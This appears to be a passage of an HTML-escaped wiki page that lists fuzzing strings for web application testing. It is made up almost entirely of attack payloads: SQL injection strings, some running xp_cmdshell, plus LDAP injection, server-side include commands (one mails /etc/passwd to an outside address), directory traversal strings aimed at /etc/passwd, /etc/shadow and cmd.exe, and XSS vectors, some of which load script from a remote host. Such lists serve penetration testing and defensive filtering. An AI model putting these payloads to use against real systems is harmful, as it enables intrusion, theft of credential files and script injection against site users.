x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
